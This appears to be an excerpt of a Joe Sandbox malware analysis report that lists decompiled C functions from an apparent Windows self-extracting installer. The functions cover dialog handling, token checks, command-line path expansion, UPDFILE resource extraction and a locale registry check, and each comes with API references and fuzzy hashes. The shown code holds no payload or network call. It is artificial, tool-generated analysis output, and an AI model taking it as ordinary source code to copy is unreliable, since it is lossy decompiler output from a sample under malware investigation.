                                                                                                                                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(000218DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,000218DD), ref: 00021855
                                                                                                                                                                                                                                                • FreeSid.ADVAPI32(?,?,?,?,000218DD), ref: 00021883
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,000218DD), ref: 0002188A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                                • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                                • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                                • Opcode ID: be2d02c5c08e698a464773479800c1c911da3efb17e0bf02b862307b4235636d
                                                                                                                                                                                                                                                • Instruction ID: 4fd8c58f57ca7f730a1bc1a53de01442433b19b2a01a8a5b2f6cb13002c52ce5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be2d02c5c08e698a464773479800c1c911da3efb17e0bf02b862307b4235636d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D119631F00219AFEB109FA4EC89ABEBBB8EF45700F100169FA05E2290DE359D058791
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00023450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                                				void* _t7;
                                                                                                                                                                                                                                                				void* _t11;
                                                                                                                                                                                                                                                				struct HWND__* _t12;
                                                                                                                                                                                                                                                				int _t22;
                                                                                                                                                                                                                                                				struct HWND__* _t24;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t7 = _a8 - 0x10;
                                                                                                                                                                                                                                                				if(_t7 == 0) {
                                                                                                                                                                                                                                                					EndDialog(_a4, 2);
                                                                                                                                                                                                                                                					L11:
                                                                                                                                                                                                                                                					return 1;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t11 = _t7 - 0x100;
                                                                                                                                                                                                                                                				if(_t11 == 0) {
                                                                                                                                                                                                                                                					_t12 = GetDesktopWindow();
                                                                                                                                                                                                                                                					_t24 = _a4;
                                                                                                                                                                                                                                                					E000243D0(_t24, _t12);
                                                                                                                                                                                                                                                					SetWindowTextA(_t24, "lenta");
                                                                                                                                                                                                                                                					SetDlgItemTextA(_t24, 0x838,  *0x29404);
                                                                                                                                                                                                                                                					SetForegroundWindow(_t24);
                                                                                                                                                                                                                                                					goto L11;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(_t11 == 1) {
                                                                                                                                                                                                                                                					_t22 = _a12;
                                                                                                                                                                                                                                                					if(_t22 < 6) {
                                                                                                                                                                                                                                                						goto L11;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(_t22 <= 7) {
                                                                                                                                                                                                                                                						L8:
                                                                                                                                                                                                                                                						EndDialog(_a4, _t22);
                                                                                                                                                                                                                                                						return 1;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(_t22 != 0x839) {
                                                                                                                                                                                                                                                						goto L11;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					 *0x291dc = 1;
                                                                                                                                                                                                                                                					goto L8;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                                                			}









                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • EndDialog.USER32(?,?), ref: 00023490
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 0002349A
                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,lenta), ref: 000234B2
                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,00000838), ref: 000234C4
                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 000234CB
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000002), ref: 000234D8
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                                • String ID: lenta
                                                                                                                                                                                                                                                • API String ID: 852535152-2780258678
                                                                                                                                                                                                                                                • Opcode ID: 50caacff4fb4d9c20fbd0341367fbe3e8b29471de8291b24be9968240f7e7e12
                                                                                                                                                                                                                                                • Instruction ID: 8aacc48e9c275a3742d155db9d7fbb5ee140e354e51ac8e4a627be6562d5e6b8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 50caacff4fb4d9c20fbd0341367fbe3e8b29471de8291b24be9968240f7e7e12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7501B531340134ABE73A6F65FC0C96D3A55EB06B10F204050F946965A0CB3CAF53CB81
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 95%
                                                                                                                                                                                                                                                			E00022AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t16;
                                                                                                                                                                                                                                                				int _t21;
                                                                                                                                                                                                                                                				char _t32;
                                                                                                                                                                                                                                                				intOrPtr _t34;
                                                                                                                                                                                                                                                				char* _t38;
                                                                                                                                                                                                                                                				char _t42;
                                                                                                                                                                                                                                                				char* _t44;
                                                                                                                                                                                                                                                				CHAR* _t52;
                                                                                                                                                                                                                                                				intOrPtr* _t55;
                                                                                                                                                                                                                                                				CHAR* _t59;
                                                                                                                                                                                                                                                				void* _t62;
                                                                                                                                                                                                                                                				CHAR* _t64;
                                                                                                                                                                                                                                                				CHAR* _t65;
                                                                                                                                                                                                                                                				signed int _t66;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t60 = __edx;
                                                                                                                                                                                                                                                				_t16 =  *0x28004; // 0xf4950d3e
                                                                                                                                                                                                                                                				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                                                                				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                                                                				_t65 = _a4;
                                                                                                                                                                                                                                                				_t44 = __edx;
                                                                                                                                                                                                                                                				_t64 = __ecx;
                                                                                                                                                                                                                                                				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                                                                					GetModuleFileNameA( *0x29a3c,  &_v268, 0x104);
                                                                                                                                                                                                                                                					while(1) {
                                                                                                                                                                                                                                                						_t17 =  *_t64;
                                                                                                                                                                                                                                                						if(_t17 == 0) {
                                                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                                                                						 *_t65 =  *_t64;
                                                                                                                                                                                                                                                						if(_t21 != 0) {
                                                                                                                                                                                                                                                							_t65[1] = _t64[1];
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						if( *_t64 != 0x23) {
                                                                                                                                                                                                                                                							L19:
                                                                                                                                                                                                                                                							_t65 = CharNextA(_t65);
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                                							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                                                                								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                                                                									if( *_t64 == 0x23) {
                                                                                                                                                                                                                                                										goto L19;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									E00021680(_t65, E000217C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                                									_t52 = _t65;
                                                                                                                                                                                                                                                									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                                                                									_t60 = _t14;
                                                                                                                                                                                                                                                									do {
                                                                                                                                                                                                                                                										_t32 =  *_t52;
                                                                                                                                                                                                                                                										_t52 =  &(_t52[1]);
                                                                                                                                                                                                                                                									} while (_t32 != 0);
                                                                                                                                                                                                                                                									goto L17;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								E000265E8( &_v268);
                                                                                                                                                                                                                                                								_t55 =  &_v268;
                                                                                                                                                                                                                                                								_t62 = _t55 + 1;
                                                                                                                                                                                                                                                								do {
                                                                                                                                                                                                                                                									_t34 =  *_t55;
                                                                                                                                                                                                                                                									_t55 = _t55 + 1;
                                                                                                                                                                                                                                                								} while (_t34 != 0);
                                                                                                                                                                                                                                                								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                                                                								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                                                                									 *_t38 = 0;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								E00021680(_t65, E000217C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                                								_t59 = _t65;
                                                                                                                                                                                                                                                								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                                                                								_t60 = _t12;
                                                                                                                                                                                                                                                								do {
                                                                                                                                                                                                                                                									_t42 =  *_t59;
                                                                                                                                                                                                                                                									_t59 =  &(_t59[1]);
                                                                                                                                                                                                                                                								} while (_t42 != 0);
                                                                                                                                                                                                                                                								L17:
                                                                                                                                                                                                                                                								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					 *_t65 = _t17;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00026CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                                                                			}























                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00022AE6
                                                                                                                                                                                                                                                • IsDBCSLeadByte.KERNEL32(00000000), ref: 00022AF2
                                                                                                                                                                                                                                                • CharNextA.USER32(?), ref: 00022B12
                                                                                                                                                                                                                                                • CharUpperA.USER32 ref: 00022B1E
                                                                                                                                                                                                                                                • CharPrevA.USER32(?,?), ref: 00022B55
                                                                                                                                                                                                                                                • CharNextA.USER32(?), ref: 00022BD4
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 571164536-0
                                                                                                                                                                                                                                                • Opcode ID: b655028571a7923eed34aa933c6682649886455c29e8a6d00232948ba0d57930
                                                                                                                                                                                                                                                • Instruction ID: 2dbbbebd71c2afe18add7d6c49a66729588107364ca52cd271ec7733a4290fb8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b655028571a7923eed34aa933c6682649886455c29e8a6d00232948ba0d57930
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E64127346042656FDB669F74AC54AFD7BA99F57310F14009AE8C287202DF394E86CB51
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                                                                			E000243D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				struct tagRECT _v24;
                                                                                                                                                                                                                                                				struct tagRECT _v40;
                                                                                                                                                                                                                                                				struct HWND__* _v44;
                                                                                                                                                                                                                                                				intOrPtr _v48;
                                                                                                                                                                                                                                                				int _v52;
                                                                                                                                                                                                                                                				intOrPtr _v56;
                                                                                                                                                                                                                                                				int _v60;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t29;
                                                                                                                                                                                                                                                				void* _t53;
                                                                                                                                                                                                                                                				intOrPtr _t56;
                                                                                                                                                                                                                                                				int _t59;
                                                                                                                                                                                                                                                				struct HWND__* _t63;
                                                                                                                                                                                                                                                				struct HWND__* _t67;
                                                                                                                                                                                                                                                				struct HWND__* _t68;
                                                                                                                                                                                                                                                				struct HDC__* _t69;
                                                                                                                                                                                                                                                				int _t72;
                                                                                                                                                                                                                                                				signed int _t74;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t63 = __edx;
                                                                                                                                                                                                                                                				_t29 =  *0x28004; // 0xf4950d3e
                                                                                                                                                                                                                                                				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                                                                				_t68 = __edx;
                                                                                                                                                                                                                                                				_v44 = __ecx;
                                                                                                                                                                                                                                                				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                                                                				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                                                                				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                                                                				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                                                                				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                                                                				_t69 = GetDC(_v44);
                                                                                                                                                                                                                                                				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                                                                				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                                                                				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                                                                				_t56 = _v48;
                                                                                                                                                                                                                                                				asm("cdq");
                                                                                                                                                                                                                                                				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                                                                				_t67 = 0;
                                                                                                                                                                                                                                                				if(_t72 >= 0) {
                                                                                                                                                                                                                                                					_t63 = _v52;
                                                                                                                                                                                                                                                					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                                                                						_t72 = _t63 - _t56;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t72 = _t67;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				asm("cdq");
                                                                                                                                                                                                                                                				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                                                                				if(_t59 >= 0) {
                                                                                                                                                                                                                                                					_t63 = _v60;
                                                                                                                                                                                                                                                					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                                                                						_t59 = _t63 - _t53;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t59 = _t67;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00026CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                                                                			}

























                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 000243F1
                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0002440B
                                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 00024423
                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 0002442E
                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0002443A
                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00024447
                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 000244A2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2212493051-0
                                                                                                                                                                                                                                                • Opcode ID: f87daf6916d748c6eac4d3ab3266a1187f9aa70be8fda9792e1e12e5e2dd6676
                                                                                                                                                                                                                                                • Instruction ID: 6277a578f59b09c0b013c51046551c7b9d7938181297b25d5203c45c3e49e06c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f87daf6916d748c6eac4d3ab3266a1187f9aa70be8fda9792e1e12e5e2dd6676
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED312D32F00119AFDB14DFB8DD899EEBBB5EB89310F254169F805F3250DA346D058B61
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 53%
E00026298(intOrPtr __ecx, intOrPtr* __edx) {
	signed int _v8;
	char _v28;
	intOrPtr _v32;
	struct HINSTANCE__* _v36;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t16;
	struct HRSRC__* _t21;
	intOrPtr _t26;
	void* _t30;
	struct HINSTANCE__* _t36;
	intOrPtr* _t40;
	void* _t41;
	intOrPtr* _t44;
	intOrPtr* _t45;
	void* _t47;
	signed int _t50;
	struct HINSTANCE__* _t51;

	_t44 = __edx;
	_t16 =  *0x28004; // 0xf4950d3e
	_v8 = _t16 ^ _t50;
	_t46 = 0;
	_v32 = __ecx;
	_v36 = 0;
	_t36 = 1;
	E0002171E( &_v28, 0x14, "UPDFILE%lu", 0);
	while(1) {
		_t51 = _t51 + 0x10;
		_t21 = FindResourceA(_t46,  &_v28, 0xa);
		if(_t21 == 0) {
			break;
		}
		_t45 = LockResource(LoadResource(_t46, _t21));
		if(_t45 == 0) {
			 *0x29124 = 0x80070714;
			_t36 = _t46;
		} else {
			_t5 = _t45 + 8; // 0x8
			_t44 = _t5;
			_t40 = _t44;
			_t6 = _t40 + 1; // 0x9
			_t47 = _t6;
			do {
				_t26 =  *_t40;
				_t40 = _t40 + 1;
			} while (_t26 != 0);
			_t41 = _t40 - _t47;
			_t46 = _t51;
			_t7 = _t41 + 1; // 0xa
			 *0x2a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
			_t30 = _v32();
			if(_t51 != _t51) {
				asm("int 0x29");
			}
			_push(_t45);
			if(_t30 == 0) {
				_t36 = 0;
				FreeResource(??);
			} else {
				FreeResource();
				_v36 = _v36 + 1;
				E0002171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
				_t46 = 0;
				continue;
			}
		}
		L12:
		return E00026CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
	}
	goto L12;
}
                                                                                                                                                                                                                                                0x00026339
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00026339
                                                                                                                                                                                                                                                0x00026319
                                                                                                                                                                                                                                                0x0002636b
                                                                                                                                                                                                                                                0x0002637d
                                                                                                                                                                                                                                                0x0002637d
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0002171E: _vsnprintf.MSVCRT ref: 00021750
                                                                                                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,000251CA,00000004,00000024,00022F71,?,00000002,00000000), ref: 000262CD
                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,000251CA,00000004,00000024,00022F71,?,00000002,00000000), ref: 000262D4
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,000251CA,00000004,00000024,00022F71,?,00000002,00000000), ref: 0002631B
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00026345
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,000251CA,00000004,00000024,00022F71,?,00000002,00000000), ref: 00026357
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                                • String ID: UPDFILE%lu
                                                                                                                                                                                                                                                • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                                • Opcode ID: bcf11c2bf8b48972195902f8dc1eb3ee0af2abaa2c6c99e4f8bf39a9525ac2aa
                                                                                                                                                                                                                                                • Instruction ID: b2d699d5d3641e74044872e477d9f5acbea3aec8610d93cd911e027ad51eeb26
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bcf11c2bf8b48972195902f8dc1eb3ee0af2abaa2c6c99e4f8bf39a9525ac2aa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C21F675A00229AFDB20DF64EC459FE7B7CFB49710B200119F906A3241DB7A9E068BE0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E0002681F(void* __ebx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v20;
                                                                                                                                                                                                                                                				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                                                                				void* _v172;
                                                                                                                                                                                                                                                				int* _v176;
                                                                                                                                                                                                                                                				int _v180;
                                                                                                                                                                                                                                                				int _v184;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t19;
                                                                                                                                                                                                                                                				long _t31;
                                                                                                                                                                                                                                                				signed int _t35;
                                                                                                                                                                                                                                                				void* _t36;
                                                                                                                                                                                                                                                				intOrPtr _t41;
                                                                                                                                                                                                                                                				signed int _t44;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t36 = __ebx;
                                                                                                                                                                                                                                                				_t19 =  *0x28004; // 0xf4950d3e
                                                                                                                                                                                                                                                				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                                                                				_t41 =  *0x281d8; // 0x0
                                                                                                                                                                                                                                                				_t43 = 0;
                                                                                                                                                                                                                                                				_v180 = 0xc;
                                                                                                                                                                                                                                                				_v176 = 0;
                                                                                                                                                                                                                                                				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                                                                					 *0x281d8 = 0;
                                                                                                                                                                                                                                                					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                                					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                                                                						L12:
                                                                                                                                                                                                                                                						_t41 =  *0x281d8; // 0x0
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_t41 = 1;
                                                                                                                                                                                                                                                						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                                                                							goto L12;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t31 = RegQueryValueExA(_v172, 0x21140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                                                                							_t43 = _t31;
                                                                                                                                                                                                                                                							RegCloseKey(_v172);
                                                                                                                                                                                                                                                							if(_t31 != 0) {
                                                                                                                                                                                                                                                								goto L12;
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_t40 =  &_v176;
                                                                                                                                                                                                                                                								if(E000266F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                                                                									goto L12;
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                                                                									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                                                                										 *0x281d8 = _t41;
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										goto L12;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00026CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                                                                			}

                                                                                                                                                                                                                                                0x0002691c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002691e
                                                                                                                                                                                                                                                0x00026924
                                                                                                                                                                                                                                                0x0002692b
                                                                                                                                                                                                                                                0x00026932
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002692b
                                                                                                                                                                                                                                                0x0002691c
                                                                                                                                                                                                                                                0x0002690a
                                                                                                                                                                                                                                                0x00026885
                                                                                                                                                                                                                                                0x00026876
                                                                                                                                                                                                                                                0x00026951

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0002686E
                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000004A), ref: 000268A7
                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 000268CC
                                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,00021140,00000000,?,?,0000000C), ref: 000268F4
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00026902
                                                                                                                                                                                                                                                  • Part of subcall function 000266F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0002691A), ref: 00026741
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • Control Panel\Desktop\ResourceLocale, xrefs: 000268C2
